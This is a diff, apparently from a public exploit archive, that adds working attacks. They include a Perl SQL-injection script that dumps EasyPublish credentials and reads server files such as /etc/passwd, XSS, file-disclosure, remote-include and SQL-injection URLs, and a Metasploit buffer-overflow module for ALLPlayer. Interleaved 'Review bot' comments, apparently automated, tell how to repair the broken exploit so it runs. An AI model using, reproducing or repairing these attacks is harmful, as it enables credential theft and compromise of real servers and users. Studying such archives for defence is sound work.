by : Khashayar Fereidani * +*Exploited by : Khashayar Fereidani * +*My Official Website : http://fereidani.ir * +**************************************************** +* Mod Options : * +* Mod 1 : Find mysql username and root password * +* Mod 2 : Save PHP config source in your system * +****************************************************"; +print "\n \n Enter Mod : "; +$mod=; +if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } +else { print "\n Unknown Mod ! 
\n Exploit Failed !"; }; +if ($mod=="1") { xpl1(); }; +if ($mod=="2") { xpl2(); }; diff --git a/platforms/php/webapps/32089.pl b/platforms/php/webapps/32089.pl new file mode 100755 index 000000000..7fdf7e5cb --- /dev/null +++ b/platforms/php/webapps/32089.pl 
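Review bot: The script does not compile as committed: `$fil3 = ;` and `$mod=;` have lost their `<STDIN>` readhandles, and the `split(//,$name)` / `split(//,$password)` calls have lost their delimiter patterns — the constants in the injection, `0x3c656e64757365723e` and `0x3c656e64706173733e`, decode to `<enduser>` and `<endpass>`, which is what those splits must have matched before the angle-bracketed tokens were stripped. They should read `chomp($fil3 = <STDIN>);`, `chomp($mod = <STDIN>);` and `($name) = split(/<enduser>/, $name);` (likewise `<endpass>` for `$password`); the `chomp` also matters because `$fil3` is interpolated raw into `load_file('$fil3')` and the trailing newline would otherwise land inside the SQL string. Separately, `$contlen` and `$poststring` are never assigned, so the POST goes out with an undefined content-length header and an empty body; a GET, as the header comment's `Variable Method : GET` says, matches the payload, which travels entirely in the query string.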
@@ -0,0 +1,203 @@ +source: http://www.securityfocus.com/bid/30307/info + +EasyPublish is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include SQL-injection and cross-site scripting vulnerabilities. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +EasyPublish 3.0tr is vulnerable; other versions may also be affected. + +NOTE: This BID was originally titled 'EasyPublish Multiple Input Validation Vulnerabilities', but has been changed to better describe the issues. + +#!/usr/bin/perl +#---------------------------------------------------------------- +# +#Script : EasyPublish 3.0tr +# +#Type : Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) +# +#Variable Method : GET +# +#Alert : High +# +#---------------------------------------------------------------- +# +#Discovered by : Khashayar Fereidani a.k.a. 
Dr.Crash +# +#My Official Website : HTTP://FEREIDANI.IR +# +#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com +# +#---------------------------------------------------------------- +# +#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR +# +#---------------------------------------------------------------- +# +#Script Download : http://myiosoft.com/download/EasyPublish/easypublish-30tr.zip +# +#---------------------------------------------------------------- +# +#Xss 1 : http://Example//staticpages/easypublish/index.php?PageSection=0&page=individual&table=edp_News&read=% +# +#---------------------------------------------------------------- +# +#SQL Injection : +# +#SQL 1 : http://Example/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*;-- +# +# +#---------------------------------------------------------------- +# +# Tnx : God +# +# HTTP://IRCRASH.COM +# +#---------------------------------------------------------------- + + +use LWP; +use HTTP::Request; +use Getopt::Long; + + + + +sub header +{ +print " +**************************************************** +* EasyPublish 3.0tr Exploit * +**************************************************** +*Discovered by : Khashayar Fereidani * +*Exploited by : Khashayar Fereidani * +*My Official Website : http://fereidani.ir * +****************************************************"; +} + +sub usage +{ + print " +* Usage : perl $0 http://Example/ +**************************************************** +"; +} + + +$url = ($ARGV[0]); + +if(!$url) +{ +header(); +usage(); +exit; +} +if($url !~ /\//){$url = $url."/";} +if($url !~ /http:\/\//){$url = "http://".$url;} +sub xpl1() +{ +$vul = 
"/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*"; +$requestpage = $url.$vul; + + +my $req = HTTP::Request->new("POST",$requestpage); +$ua = LWP::UserAgent->new; +$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); +#$req->referer($url); +$req->referer("IRCRASH.COM"); +$req->content_type('application/x-www-form-urlencoded'); +$req->header("content-length" => $contlen); +$req->content($poststring); + +$response = $ua->request($req); +$content = $response->content; +$header = $response->headers_as_string(); + +@name = split(/Login:/,$content); +$name = @name[1]; +@name = split(//,$name); +$name = @name[0]; + +@password = split(/Password:/,$content); +$password = @password[1]; +@password = split(//,$password); +$password = @password[0]; + +if(!$name && !$password) +{ +print "\n\n"; +print "!Exploit failed ! 
:(\n\n"; +exit; +} + +print "\n Username: ".$name."\n\n"; +print " Password: " .$password."\n\n"; + + +} + + +#XPL2 + +sub xpl2() +{ +print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd"; +print "\n Enter File Address :"; +$fil3 = ; + +$vul = "/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),3,4,1,5+FROM+edp_puusers/*"; +$requestpage = $url.$vul; + +my $req = HTTP::Request->new("POST",$requestpage); +$ua = LWP::UserAgent->new; +$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); +#$req->referer($url); +$req->referer("IRCRASH.COM"); +$req->content_type('application/x-www-form-urlencoded'); +$req->header("content-length" => $contlen); +$req->content($poststring); + +$response = $ua->request($req); +$content = $response->content; +$header = $response->headers_as_string(); + + +@name = split(/Login:/,$content); +$name = @name[1]; +@name = split(//,$name); +$name = @name[0]; + + +if(!$name && !$password) +{ +print "\n\n"; +print "!Exploit failed ! :(\n\n"; +exit; +} + +open (FILE, ">".source.".txt"); +print FILE $name; +close (FILE); +print " File Save In source.txt\n"; +print ""; + +} + +#XPL2 END +#Starting; +print " +**************************************************** +* EasyPublish 3.0tr Exploit * +**************************************************** +*Discovered by : Khashayar Fereidani * +*Exploited by : Khashayar Fereidani * +*My Official Website : http://fereidani.ir * +**************************************************** +* Mod Options : * +* Mod 1 : Find mysql username and root password * +* Mod 2 : Save PHP config source in your system * +****************************************************"; +print "\n \n Enter Mod : "; +$mod=; +if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! 
\n Exploit Failed !"; };
+if ($mod=="1") { xpl1(); };
+if ($mod=="2") { xpl2(); };
diff --git a/platforms/php/webapps/32090.txt b/platforms/php/webapps/32090.txt
new file mode 100755
index 000000000..94ac5a9d7
--- /dev/null
+++ b/platforms/php/webapps/32090.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30309/info
+
+Maran PHP Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/comments.php?id=%3E%3C%3E%27%3Cscript%3Ealert(document.cookie)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/32091.txt b/platforms/php/webapps/32091.txt
new file mode 100755
index 000000000..b968b4f96
--- /dev/null
+++ b/platforms/php/webapps/32091.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/30310/info
+
+MyBlog is prone to multiple information-disclosure vulnerabilities because the application fails to properly restrict access to sensitive files.
+
+An unprivileged attacker may exploit these issues to obtain sensitive information.
+
+MyBlog 0.9.8 is vulnerable; other versions may also be affected.
+
+http://www.example.com/config/mysqlconnection.inc
+http://www.example.com/config/mysqlconnection%20-%20Copy.inc
+http://www.example.com/admin/setup.php
+http://www.example.com/config/settings.inc
\ No newline at end of file
diff --git a/platforms/php/webapps/32092.txt b/platforms/php/webapps/32092.txt
new file mode 100755
index 000000000..05f154b1a
--- /dev/null
+++ b/platforms/php/webapps/32092.txt
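Review bot: `$fil3 = ;` and `$mod=;` are syntax errors — the `<STDIN>` readhandles were stripped along with the `<enduser>`/`<endpass>` delimiters in the `split(//, …)` calls (those are what `0x3c656e64757365723e` and `0x3c656e64706173733e` in the injection spell out), so the file cannot run until they are put back, e.g. `chomp($fil3 = <STDIN>);` and `($name) = split(/<enduser>/, $name);`. The `chomp` is needed in its own right: `$fil3` goes unescaped into `load_file('$fil3')`, where a trailing newline or an embedded `'` breaks the query, so at least `chomp` it and URL-encode it before appending it to the request. The `if(!$name && !$password)` test in xpl2 reads a variable that xpl2 never sets, so it is just `!$name` written confusingly; dropping `&& !$password` there makes the intended check explicit.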
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30312/info
+
+Flip is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Flip 3.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/config.php?incpath=[SHELL]
\ No newline at end of file
diff --git a/platforms/php/webapps/32093.txt b/platforms/php/webapps/32093.txt
new file mode 100755
index 000000000..04acda8a9
--- /dev/null
+++ b/platforms/php/webapps/32093.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/30318/info
+
+phpKF is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+
+http://www.example.com/lab/phpkf/yonetim/forum_duzen.php?kip=forum_duzenle&fno='+union+select+kullanici_adi,concat(database(),0x3a,version()),sifre+from+phpkf_kullanicilar/*
\ No newline at end of file
diff --git a/platforms/windows/local/32074.rb b/platforms/windows/local/32074.rb
new file mode 100755
index 000000000..c5f690e2d
--- /dev/null
+++ b/platforms/windows/local/32074.rb
@@ -0,0 +1,107 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ALLPlayer M3U Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow vulnerability in
+ ALLPlayer 2.8.1, caused by a long string in a playlist entry.
+ By persuading the victim to open a specially-crafted .M3U file, a
+ remote attacker could execute arbitrary code on the system or cause
+ the application to crash. This module has been tested successfully on
+ Windows 7 SP1.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'metacom', # Vulnerability discovery
+ 'Mike Czumak', # Original exploit
+ 'Gabor Seljan' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'BID', '62926' ],
+ [ 'BID', '63896' ],
+ [ 'EDB', '28855' ],
+ [ 'EDB', '29549' ],
+ [ 'EDB', '29798' ],
+ [ 'EDB', '32041' ],
+ [ 'OSVDB', '98283' ],
+ [ 'URL', 'http://www.allplayer.org/' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => 'process'
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'BadChars' => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
+ 'Space' => 3060,
+ 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
+ 'EncoderOptions' =>
+ {
+ 'BufferRegister' => 'EAX'
+ }
+ },
+ 'Targets' =>
+ [
+ [ ' ALLPlayer 2.8.1 / Windows 7 SP1',
+ {
+ 'Offset' => 301,
+ 'Ret' => "\x50\x45", # POP POP RET from ALLPlayer.exe
+ 'Nop' => "\x6e" # ADD BYTE PTR DS:[ESI],CH
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Oct 09 2013',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
+ ],
+ self.class)
+
+ end
+
+
+ def 
exploit
+ nop = target['Nop']
+
+ sploit = rand_text_alpha_upper(target['Offset'])
+ sploit << "\x61\x50" # POPAD
+ sploit << target.ret
+ sploit << "\x53" # PUSH EBX
+ sploit << nop
+ sploit << "\x58" # POP EAX
+ sploit << nop
+ sploit << "\x05\x14\x11" # ADD EAX,0x11001400
+ sploit << nop
+ sploit << "\x2d\x13\x11" # SUB EAX,0x11001300
+ sploit << nop
+ sploit << "\x50" # PUSH EAX
+ sploit << nop
+ sploit << "\xc3" # RET
+ sploit << nop * 109
+ sploit << payload.encoded
+ sploit << rand_text_alpha_upper(10000) # Generate exception
+
+ # Create the file
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
+ file_create("http://" + sploit)
+
+ end
+end
\ No newline at end of file
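Review bot: The module's header comment on the second added line, `# This module requires Metasploit: http//metasploit.com/download`, is missing the colon after the scheme and should read `# This module requires Metasploit: http://metasploit.com/download`; as written the link does not resolve for anyone who copies it from the file. The single entry under 'Targets', `' ALLPlayer 2.8.1 / Windows 7 SP1'`, also carries a leading space inside the quotes that will appear verbatim in the framework's target listing and looks accidental; `'ALLPlayer 2.8.1 / Windows 7 SP1'` is presumably what was intended. Both are wording-only fixes in `initialize`; the `exploit` method is otherwise unaffected.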